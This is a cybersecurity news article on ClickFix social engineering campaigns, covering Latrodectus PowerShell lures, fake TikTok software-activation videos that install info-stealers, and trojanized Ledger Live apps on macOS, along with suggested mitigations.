Cybercriminals are stepping up their use of ClickFix malware attacks, a deceptive social engineering technique that continues to bypass traditional security controls. The latest threat actor to adopt this method is Latrodectus, a malware strain believed to be the successor to IcedID. First identified in April 2024, Latrodectus operates as a downloader for more damaging payloads like ransomware.
In May 2025, researchers at Expel uncovered a fresh wave of Latrodectus attacks using ClickFix tactics. Victims are tricked into copying and pasting PowerShell commands from infected websites, which execute entirely in memory. This in-memory execution avoids writing files to disk—bypassing many antivirus and browser defenses.
“These PowerShell commands download a malicious MSI file from a remote server using MSIExec, which sideloads a legitimate NVIDIA application to sneak in a malicious DLL,” said Expel. The DLL then uses curl to fetch and run the final payload, all without triggering typical detection systems.
Despite recent takedowns as part of Operation Endgame—a global law enforcement action that dismantled infrastructure supporting malware like QakBot, TrickBot, and Bumblebee—Latrodectus remains active. Operation Endgame shut down 300 servers and 650 domains in May 2025, but clearly, malware authors are adapting fast.
To mitigate the risk of ClickFix delivery methods, organizations are advised to disable the Windows Run dialog via Group Policy or block the “Windows + R” hotkey with a Registry update—two common entry points for user-executed malware scripts.
TikTok Joins the ClickFix Arsenal
As if malicious links weren’t enough, TikTok has now emerged as a new front in ClickFix malware attacks. A Trend Micro report details a campaign where fake tutorial videos instruct users to run dangerous PowerShell commands—under the guise of activating pirated software like Microsoft Office, Spotify, CapCut, and even Windows itself.
These TikTok videos, some garnering hundreds of thousands of views, feature verbal and visual instructions prompting users to open the Run dialog (Windows + R), launch PowerShell, and paste in attacker-supplied commands.
“Threat actors are now weaponizing AI-generated TikTok videos to guide users step-by-step into compromising their own systems,” said Trend Micro researcher Junestherry Dela Cruz. Once executed, the scripts install information-stealing malware like Vidar and StealC—without any file downloads that could alert antivirus tools.
While the TikTok accounts used in the campaign (including @gitallowed, @zane.houghton, and @alexfixpc) have since been taken down, the threat persists. Experts warn that as social media evolves, attackers will continue to exploit popular platforms to deliver malware through trusted, user-generated content.
macOS Under Fire with Fake Ledger Live Apps
The rise in ClickFix tactics isn’t limited to Windows. Mac users are also being targeted through fake Ledger Live apps designed to steal cryptocurrency wallet seed phrases. Four active malware campaigns, ongoing since August 2024, use trojanized DMG installers to exfiltrate sensitive information via AppleScript.
Once the fake app is launched, users are told their account requires “recovery,” prompting them to enter their seed phrase. This data is sent directly to attacker-controlled servers. Cybersecurity researchers at Moonlock Lab and Jamf confirmed that the campaign uses macOS malware like AMOS (Atomic macOS Stealer) and Odyssey, which began implementing the phishing scheme in March 2025.
Some of the attacks also rely on PyInstaller-packed binaries, creating persistent threats for Ledger users. According to MacPaw’s Moonlock Lab, activity around anti-Ledger scams is growing rapidly across dark web forums, and more sophisticated waves are expected soon. “Hackers will continue to exploit the trust crypto holders place in apps like Ledger Live,” said the Moonlock team.
As ClickFix malware attacks evolve across platforms and delivery channels—from websites to TikTok and even crypto apps—users and organizations alike must stay vigilant. Disabling risky features, educating users about social engineering, and using advanced endpoint protection are more critical than ever in this changing threat landscape.
